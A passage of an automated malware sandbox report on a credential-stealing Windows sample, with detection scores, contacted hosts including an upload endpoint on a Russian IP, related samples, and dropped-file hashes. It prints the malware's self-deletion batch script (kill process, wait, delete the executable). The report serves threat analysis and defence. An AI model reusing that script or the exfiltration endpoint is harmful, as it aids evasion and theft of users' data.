24 conhost.exe 12->24         started        26 netsh.exe 2 15->26         started        28 conhost.exe 15->28         started        30 findstr.exe 1 15->30         started        32 chcp.com 1 15->32         started        40 C:\ProgramData\Microsoft\...\Report.wer, Unicode 17->40 dropped 34 taskkill.exe 1 20->34         started        36 conhost.exe 20->36         started        38 2 other processes 20->38 signatures9 process10

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
    T05Dk6G8fg.exe55%ReversingLabsWin32.Trojan.Ursu
    T05Dk6G8fg.exe100%AviraHEUR/AGEN.1309950
    T05Dk6G8fg.exe100%Joe Sandbox ML
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    SourceDetectionScannerLabelLink
    http://89.23.100.233:1488/upload0%Avira URL Cloudsafe
    http://89.23.100.233:1488/uploadt0%Avira URL Cloudsafe
    http://89.23.100.233:14880%Avira URL Cloudsafe
    http://beta.visualstudio.net/net/sdk/feedback.asp0%Avira URL Cloudsafe
    NameIPActiveMaliciousAntivirus DetectionReputation
    icanhazip.com
    104.16.184.241
    truefalse
      high
      15.55.7.0.in-addr.arpa
      unknown
      unknowntrue
        unknown
        NameMaliciousAntivirus DetectionReputation
        http://icanhazip.com/false
          high
          http://89.23.100.233:1488/uploadtrue
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://beta.visualstudio.net/net/sdk/feedback.aspT05Dk6G8fg.exe, 00000001.00000002.43990776194.0000000070E90000.00000020.00000001.01000000.00000008.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://ac.ecosia.org/autocomplete?q=tmpD36E.tmp.dat.1.drfalse
            high
            https://www.google.comT05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002FD4000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              https://duckduckgo.com/chrome_newtabT05Dk6G8fg.exe, 00000001.00000002.43986346912.00000000076ED000.00000004.00000020.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000004006000.00000004.00000800.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, tmpD370.tmp.dat.1.dr, tmpD36D.tmp.dat.1.dr, tmpD36E.tmp.dat.1.drfalse
                high
                https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/searchT05Dk6G8fg.exe, 00000001.00000002.43986346912.00000000076ED000.00000004.00000020.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000004006000.00000004.00000800.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, tmpD370.tmp.dat.1.dr, tmpD36D.tmp.dat.1.dr, tmpD36E.tmp.dat.1.drfalse
                  high
                  https://duckduckgo.com/ac/?q=tmpD36E.tmp.dat.1.drfalse
                    high
                    http://89.23.100.233:1488/uploadtT05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002FD4000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=T05Dk6G8fg.exe, 00000001.00000002.43986346912.00000000076ED000.00000004.00000020.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000004006000.00000004.00000800.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, tmpD370.tmp.dat.1.dr, tmpD36D.tmp.dat.1.dr, tmpD36E.tmp.dat.1.drfalse
                      high
                      http://89.23.100.233:1488T05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002FD4000.00000004.00000800.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=tmpD36E.tmp.dat.1.drfalse
                        high
                        http://icanhazip.comT05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002F27000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://www.ecosia.org/newtab/T05Dk6G8fg.exe, 00000001.00000002.43986346912.00000000076ED000.00000004.00000020.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000003F69000.00000004.00000800.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000004006000.00000004.00000800.00020000.00000000.sdmp, T05Dk6G8fg.exe, 00000001.00000002.43978325790.0000000003F89000.00000004.00000800.00020000.00000000.sdmp, tmpD370.tmp.dat.1.dr, tmpD36D.tmp.dat.1.dr, tmpD36E.tmp.dat.1.drfalse
                            high
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameT05Dk6G8fg.exe, 00000001.00000002.43974342595.0000000002F27000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=tmpD36E.tmp.dat.1.drfalse
                                high
                                https://gemini.google.com/app?q=tmpD36E.tmp.dat.1.drfalse
                                  high
                                  https://www.google.com/favicon.icotmpD36E.tmp.dat.1.drfalse
                                    high
                                    • No. of IPs < 25%
                                    • 25% < No. of IPs < 50%
                                    • 50% < No. of IPs < 75%
                                    • 75% < No. of IPs
                                    IPDomainCountryFlagASNASN NameMalicious
                                    89.23.100.233
                                    unknownRussian Federation
                                    48687MAXITEL-ASRUtrue
                                    104.16.184.241
                                    icanhazip.comUnited States
                                    13335CLOUDFLARENETUSfalse
                                    Joe Sandbox version:41.0.0 Charoite
                                    Analysis ID:1568332
                                    Start date and time:2024-12-04 15:05:24 +01:00
                                    Joe Sandbox product:CloudBasic
                                    Overall analysis duration:0h 7m 7s
                                    Hypervisor based Inspection enabled:false
                                    Report type:full
                                    Cookbook file name:default.jbs
                                    Analysis system description:Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2021, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
                                    Run name:Suspected VM Detection
                                    Number of analysed new started processes analysed:21
                                    Number of new started drivers analysed:0
                                    Number of existing processes analysed:0
                                    Number of existing drivers analysed:0
                                    Number of injected processes analysed:0
                                    Technologies:
                                    • HCA enabled
                                    • EGA enabled
                                    • AMSI enabled
                                    Analysis Mode:default
                                    Analysis stop reason:Timeout
                                    Sample name:T05Dk6G8fg.exe
                                    Detection:MAL
                                    Classification:mal100.troj.spyw.evad.winEXE@25/19@2/2
                                    EGA Information:
                                    • Successful, ratio: 100%
                                    HCA Information:
                                    • Successful, ratio: 100%
                                    • Number of executed functions: 277
                                    • Number of non-executed functions: 0
                                    Cookbook Comments:
                                    • Found application associated with file extension: .exe
                                    • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, backgroundTaskHost.exe, svchost.exe
                                    • Excluded IPs from analysis (whitelisted): 20.189.173.22
                                    • Excluded domains from analysis (whitelisted): assets.msn.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, nexusrules.officeapps.live.com, api.msn.com
                                    • Not all processes where analyzed, report is missing behavior information
                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                    • Report size getting too big, too many NtOpenFile calls found.
                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                    • Report size getting too big, too many NtReadVirtualMemory calls found.
                                    • Report size getting too big, too many NtSetInformationFile calls found.
                                    • VT rate limit hit for: T05Dk6G8fg.exe
                                    TimeTypeDescription
                                    09:07:35API Interceptor71x Sleep call for process: T05Dk6G8fg.exe modified
                                    09:07:47API Interceptor1x Sleep call for process: WerFault.exe modified
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    89.23.100.2333K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                    • 89.23.100.233:1489/upload
                                    VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                    • 89.23.100.233:1488/upload
                                    104.16.184.241VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                    • icanhazip.com/
                                    Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                    • icanhazip.com/
                                    gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                    • icanhazip.com/
                                    uyz4YPUyc9.exeGet hashmaliciousStealeriumBrowse
                                    • icanhazip.com/
                                    yv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                    • icanhazip.com/
                                    5E3zWXveDN.exeGet hashmaliciousStealeriumBrowse
                                    • icanhazip.com/
                                    LKxcbzlwkz.exeGet hashmaliciousAveMaria, KeyLogger, StealeriumBrowse
                                    • icanhazip.com/
                                    9fGsCDYKLV.exeGet hashmaliciousFlesh StealerBrowse
                                    • icanhazip.com/
                                    file.exeGet hashmaliciousFlesh StealerBrowse
                                    • icanhazip.com/
                                    vbe11TPn2x.exeGet hashmaliciousFlesh StealerBrowse
                                    • icanhazip.com/
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    icanhazip.com3K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                    • 104.16.185.241
                                    VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                    • 104.16.184.241
                                    Pdf Reader.exeGet hashmaliciousStealeriumBrowse
                                    • 104.16.184.241
                                    gKWbina3a4.batGet hashmaliciousStealeriumBrowse
                                    • 104.16.184.241
                                    K6aOw2Jmji.exeGet hashmaliciousStealeriumBrowse
                                    • 104.16.185.241
                                    uyz4YPUyc9.exeGet hashmaliciousStealeriumBrowse
                                    • 104.16.184.241
                                    yv7QsAR49V.exeGet hashmaliciousStealeriumBrowse
                                    • 104.16.184.241
                                    jpiWvvEcbp.exeGet hashmaliciousStealeriumBrowse
                                    • 104.16.185.241
                                    5E3zWXveDN.exeGet hashmaliciousStealeriumBrowse
                                    • 104.16.184.241
                                    LKxcbzlwkz.exeGet hashmaliciousAveMaria, KeyLogger, StealeriumBrowse
                                    • 104.16.184.241
                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                    CLOUDFLARENETUSRecent Services Delays Update.pdfGet hashmaliciousKnowBe4, PDFPhishBrowse
                                    • 104.17.247.203
                                    wa6qrGANga.exeGet hashmaliciousLummaC StealerBrowse
                                    • 104.21.58.186
                                    3K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                    • 104.16.185.241
                                    https://www.aviatorsharkao.com.br/atuussGet hashmaliciousUnknownBrowse
                                    • 104.21.43.244
                                    file.exeGet hashmaliciousAmadey, Discord Token Stealer, DotStealer, LummaC Stealer, Stealc, VidarBrowse
                                    • 172.67.181.44
                                    RzLnOTy9k3.lnkGet hashmaliciousLummaC StealerBrowse
                                    • 172.67.209.252
                                    VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                    • 104.16.184.241
                                    file.exeGet hashmaliciousLummaC StealerBrowse
                                    • 172.67.165.166
                                    QsEn4Jw9pY.lnkGet hashmaliciousUnknownBrowse
                                    • 172.67.201.111
                                    https://cdn.tailwindcss.comGet hashmaliciousUnknownBrowse
                                    • 104.22.21.144
                                    MAXITEL-ASRU3K5MXGVOJE.exeGet hashmaliciousUnknownBrowse
                                    • 89.23.100.233
                                    VaXmr82RIb.exeGet hashmaliciousUnknownBrowse
                                    • 89.23.100.233
                                    Installer_setup32_64x.exeGet hashmaliciousLummaC, StealcBrowse
                                    • 89.23.96.109
                                    9fGsCDYKLV.exeGet hashmaliciousFlesh StealerBrowse
                                    • 89.23.100.233
                                    file.exeGet hashmaliciousLummaC, Amadey, LummaC StealerBrowse
                                    • 89.23.100.233
                                    file.exeGet hashmaliciousFlesh StealerBrowse
                                    • 89.23.100.233
                                    L814CyOxMT.exeGet hashmaliciousFlesh Stealer, PureLog Stealer, zgRATBrowse
                                    • 89.23.100.233
                                    vbe11TPn2x.exeGet hashmaliciousFlesh StealerBrowse
                                    • 89.23.100.233
                                    Ham9SAD0Ou.docGet hashmaliciousUnknownBrowse
                                    • 89.23.98.98
                                    file.dllGet hashmaliciousMatanbuchusBrowse
                                    • 89.23.113.220
                                    No context
                                    No context
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):65536
                                    Entropy (8bit):1.4420018586784726
                                    Encrypted:false
                                    SSDEEP:192:l39QsPmssLbmWbkdau5I3UVWts2/FHdDu76zfAIO80YPU:t9QFs9WbkdathZF9Du76zfAIO80J
                                    MD5:A6972EC3FA7F5A773137A711969965E8
                                    SHA1:35A4D2C47533E69718EAD18A1B921400F96C624B
                                    SHA-256:93C53D6558D40F9E2D24D9F3E9E636C8D78D6BCFCCBE396FE4C7751D0B599A32
                                    SHA-512:5606141FBFF7951E6022369B83E11E24B82D8EE16B4DDB35428EDA39FB04ABB9796C3DCE8DD174DA756DAA35B877A2BCC9B5F7187D16AEEB6554C3A3102C1347
                                    Malicious:true
                                    Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.7.7.9.4.8.6.4.2.7.6.0.8.8.6.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.7.7.9.4.8.6.4.8.6.9.6.7.2.6.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.a.e.6.8.d.9.-.0.b.f.6.-.4.6.b.1.-.a.8.5.b.-.3.f.c.d.9.0.e.f.f.2.d.8.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.8.1.f.b.2.4.5.-.b.6.f.9.-.4.a.e.e.-.a.3.e.2.-.4.f.9.e.b.b.5.8.3.2.1.d.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.T.0.5.D.k.6.G.8.f.g...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.t.e.a.l.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.b.8.c.-.0.0.0.1.-.0.0.4.1.-.d.d.6.f.-.0.0.d.9.5.5.4.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.f.d.9.e.4.0.2.a.8.f.5.c.6.8.0.c.d.8.4.3.1.0.e.a.9.f.b.a.2.e.c.7.0.0.0.0.0.0.0.0.!.0.0.0.0.8.0.3.a.5.e.6.7.b.9.1.8.5.6.c.a.6.b.5.e.f.7.3.2.b.b.a.f.0.b.7.b.0.8.9.f.9.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:Mini DuMP crash report, 15 streams, CheckSum 0x00000004, Wed Dec 4 14:07:44 2024, 0x1205a4 type
                                    Category:dropped
                                    Size (bytes):259318
                                    Entropy (8bit):4.365726161094236
                                    Encrypted:false
                                    SSDEEP:3072:XClq7JRlDkow/z0uWvk4uEqpyULTgFIgSJ08nVvFdt:WqlRlDkoEzCvk4eyKTgSSI/f
                                    MD5:5533EFDDE42D4B0242AA439111F96220
                                    SHA1:DA7B0F1B9FF83EF80A21F23E9592DF40DD5AE807
                                    SHA-256:7105BA07BE436F6A12F8610DD0E025F21BE2EF1FBE877E8AF210E2C3F21539D4
                                    SHA-512:4A8D1BE193F450B935319793FD7AB14724CF1F910FFF92CBD305705307BBF6B6A927F31729E622303EFDBF7247E2B01AAE7940DA5715307DBFB5966FDEFC7D35
                                    Malicious:false
                                    Preview:MDMP..a..... .......0bPg............4............+..H.......<...,3.......%..*F..........`.......8...........T............v..&~..........h3..........T5..............................................................................bJ.......5......GenuineIntel...........T............bPg.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):8362
                                    Entropy (8bit):3.681499268677232
                                    Encrypted:false
                                    SSDEEP:192:R9l7lZNi3A67b6Y2QVSUvkgmfZbP9pDO89bF5Pmsfzbv5m:R9lnNiw6n6YrVSUvkgmflnF5Nfzj0
                                    MD5:6ECAE510AF9B80E5B9CE5720744DF5D1
                                    SHA1:6DD35C1DD91FCF096C0F659F4BE7F2F6281BF111
                                    SHA-256:048A33D0A55725E6532E2A2F1A89396851C1593DC3796FDB67537D319DA6D0FA
                                    SHA-512:D0C7F8D9B0185A3A823F9C6F2E8BFAF919CB8A167541596131E8C9A87D23AE722219E4FA656DB32A08DD4059321694CF53A7DD8FB77595EEEC3955F70EA4DEDC
                                    Malicious:false
                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.2.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...1.1.6.5...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.1.6.5.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.2.9.5.6.<./.P.i.
                                    Process:C:\Windows\SysWOW64\WerFault.exe
                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):4866
                                    Entropy (8bit):4.474768986034906
                                    Encrypted:false
                                    SSDEEP:48:cvIwwtl8zsB4e702I7VFJ5Ws2mYros3rm8M4JGn0pjCPFti+q8vQ0pjCdoVLbusM:uILfBt7GysbYnJGncMiKQc/VLbusu/d
                                    MD5:3893A94F47B81833D25F87F44EFE9333
                                    SHA1:6AAF964D68E3993315BDB9D344FEE7CC95C5B2BC
                                    SHA-256:0985199B34EB32550349A48170ACDF65AB70FCB37E41DF46261850EDEC83159A
                                    SHA-512:10B170438686D30D544E5D5230F36A0FCA04CCFE9908487E7DD8814880A41A2F4ECB54B35ADFEC3CE335B5F859DE9DDADD17FC58D818B0060B758B0178D179BE
                                    Malicious:false
                                    Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19042" />.. <arg nm="vercsdbld" val="1165" />.. <arg nm="verqfe" val="1165" />.. <arg nm="csdbld" val="1165" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="242" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="222960530" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="
                                    Process:C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    File Type:JSON data
                                    Category:dropped
                                    Size (bytes):11155
                                    Entropy (8bit):5.709733274759716
                                    Encrypted:false
                                    SSDEEP:192:zd8NBSAozdYXhuD7tCcUOP0qfVrixp9bBrkn5MVSy30Pd54:zd8NBSZzdYAosP0cra9bB4n5MVcl54
                                    MD5:8FEAAC65557534BA2A6B6E1961868AA3
                                    SHA1:B0532C3213AFB8F0676F6D20DC08ED8DA6E661A3
                                    SHA-256:A16ED4F9D0A6BCFB09A014E54F68B818F6753AD0B9E58FC563D0855220731EE8
                                    SHA-512:0DC0DBABC8F6FAB5E45865F460D68C31EE4C01A8B4C52F17FDF941CE48D482B2AB0123388E7599A2FDBAFA5AB54A52E4A01AAA39F18CEF16A2186AB4ED878120
                                    Malicious:false
                                    Preview:{"accessibility":{"captions":{"common_models_path":"","soda_binary_path":""}},"apps_count_check_time":"13377768945981403","background_tracing":{"session_state":{"privacy_filter":true,"state":0}},"breadcrumbs":{"enabled":false,"enabled_time":"13375959609050489"},"edge":{"perf_center":{"efficiency_mode_v2_is_active":false,"perf_game_mode":true,"performance_mode":3,"performance_mode_is_on":false},"tab_stabs":{"closed_without_unfreeze_never_unfrozen":0,"closed_without_unfreeze_previously_unfrozen":0,"discard_without_unfreeze_never_unfrozen":0,"discard_without_unfreeze_previously_unfrozen":0},"tab_stats":{"frozen_daily":0,"unfrozen_daily":0}},"fre":{"oem_bookmarks_set":true},"hardware_acceleration_mode_previous":true,"host_package_checked_on_browser_version":"128.0.6613.120","legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4}},"optimization_guide":{"model_store_metadata":{}},"os_crypt":{"app_bound_encrypted_key":"QVBQQgEAAADQj
                                    Process:C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    File Type:ASCII text, with CRLF line terminators
                                    Category:modified
                                    Size (bytes):107
                                    Entropy (8bit):5.141854692045334
                                    Encrypted:false
                                    SSDEEP:3:HFTEOuMJcFKsouMlwBRZDEXEPKJiAIexVQY7Cvn:yOuMJNuMlweoKJjIeb7Cvn
                                    MD5:1B846BD477AAE672A80FBDA4B82A8650
                                    SHA1:8A10CA2CBB8B5CFAA4EF1A55AAEAF3F50D8EF25E
                                    SHA-256:D7DF483BA4F03125CD26CE5370F7B3285BB144F32937AA0F3485496A131FF0D6
                                    SHA-512:42FF45D8E32E53CA7404E3EC0A92B57DF65A63E1269FE8FED8BB79A4E803E847B14317A2192EA83AE9BF437B0FE12BCB331F14D161141DA66D7C15E4364B6053
                                    Malicious:false
                                    Preview:chcp 65001..TaskKill /F /IM 2956..Timeout /T 2 /Nobreak..Del /ah "C:\Users\user\Desktop\T05Dk6G8fg.exe"..
                                    Process:C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    File Type:SQLite 3.x database, user version 13, last written using SQLite version 3045002, page size 32768, writer version 2, read version 2, file counter 4, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 4
                                    Category:dropped
                                    Size (bytes):524288
                                    Entropy (8bit):0.027515372941387128
                                    Encrypted:false
                                    SSDEEP:24:D43S232mNVpP965RayKN0MG/lTUlRt6wWUlkcObl:DoS6rh9WTKlRswRlkf
                                    MD5:21C347A9181FE59AEAE85D756BA9354F
                                    SHA1:E774CBE8A1F814DE978A7071A31EDCBB6E08663E
                                    SHA-256:1A227EBBCD4D6AD950DBBD94142CAB32E8998E1B8812E6CCFE1BCAA3C5F8673A
                                    SHA-512:B950CEB3FDA3B72FF2807878633DBDCA087990252B957F410083C3F1A1C0CF4D9EACDA2294C385293A759469FAEAE1B834A9973BA3B35108A3F9ACB9527FFD0B
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................v......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 32768, file counter 4, database pages 9, cookie 0x6, schema 4, UTF-8, version-valid-for 4
                                    Category:dropped
                                    Size (bytes):294912
                                    Entropy (8bit):0.10734238235492544
                                    Encrypted:false
                                    SSDEEP:192:Hva0zkVmvQhyn+Zoz679fqlQbGhMHPaVAL23vlL9+CtF+KG:H1zkVmvQhyn+Zoz676L9Tq1
                                    MD5:B74DBBD65DA773E9022BD0F7ADD883D8
                                    SHA1:4B2948ADA76CB5D6F57A331E64B21869F3CF1700
                                    SHA-256:475C5F54D23FC957A61A0041F1F414052A3B76B89A443BD76F87E97D681B8F9E
                                    SHA-512:DD744A83CAA62EDC68EA9F350E0EFB2029ADC2319E50A543B43D149AAE33C6900A807C32C1028B72734503E75E067EAB29775C3D64F61ED35D677A4FE195E0E8
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................v......z<.{...{.{a{.z.z<z.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 2, database pages 28, cookie 0x16, schema 4, UTF-8, version-valid-for 2
                                    Category:dropped
                                    Size (bytes):57344
                                    Entropy (8bit):0.8626037380154912
                                    Encrypted:false
                                    SSDEEP:96:nZh+Cn8MouB6w9f/HeymwilnjKLmK7qGUUuxAOG4/ff45:Z0G7Iw9fFiF0ROGSf45
                                    MD5:BB528EC6B8694A3A4D19F36E7E869DC6
                                    SHA1:69FBE351369CBFA972261A19F94AB80FAC870FFD
                                    SHA-256:A4F1A3030FFEB4E59A6DF4432369C5D046D28CF574028F98BFE6DCBEF9DDC851
                                    SHA-512:AFB430F20A4319B0ADDE92B901D31F6E68564C01A2D1364A1E886408384BE08435D074DC99C6BDC620191AF0AD4294F22762E60A4FD34162DD1040D4CD816F16
                                    Malicious:false
                                    Preview:SQLite format 3......@ ..........................................................................v.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 6, database pages 109, cookie 0x62, schema 4, UTF-8, version-valid-for 6
                                    Category:dropped
                                    Size (bytes):229376
                                    Entropy (8bit):0.9085960794285802
                                    Encrypted:false
                                    SSDEEP:384:HfKCsnNjzI63PG43lAfKIq9JvOeMZHIXI:HDsndzn/G43lAfKIq9JtmHIX
                                    MD5:17091CB4BC9C6E80CA91C12E0BBA56F4
                                    SHA1:ED7E485630B1245C7AE963FB02C899BF141DB578
                                    SHA-256:551A6521FF9A83FDB18EFB95916A74A45600A427911FE4E1BD59A2795A1EF814
                                    SHA-512:A5752E9BE8E233026C6378521127014EDD395F44AFB3C5F078300783792AEFEF1C6D08C4B63923DF9FD5AF7A1653F994677BCC40D9CF7636B26A6461F6172A4A
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......m...........b......................................................v............i........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\T05Dk6G8fg.exe
                                    File Type:SQLite 3.x database, last written using SQLite version 3045002, page size 2048, file counter 6, database pages 109, cookie 0x62, schema 4, UTF-8, version-valid-for 6
                                    Category:dropped
                                    Size (bytes):229376
                                    Entropy (8bit):0.9085960794285802
                                    Encrypted:false
                                    SSDEEP:384:HfKCsnNjzI63PG43lAfKIq9JvOeMZHIXI:HDsndzn/G43lAfKIq9JtmHIX
                                    MD5:17091CB4BC9C6E80CA91C12E0BBA56F4
                                    SHA1:ED7E485630B1245C7AE963FB02C899BF141DB578
                                    SHA-256:551A6521FF9A83FDB18EFB95916A74A45600A427911FE4E1BD59A2795A1EF814
                                    SHA-512:A5752E9BE8E233026C6378521127014EDD395F44AFB3C5F078300783792AEFEF1C6D08C4B63923DF9FD5AF7A1653F994677BCC40D9CF7636B26A6461F6172A4A
                                    Malicious:false
                                    Preview:SQLite format 3......@ .......m...........b......................................................v............i........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                    Process:C:\Users\user\Desktop\T05Dk6G8fg.exe
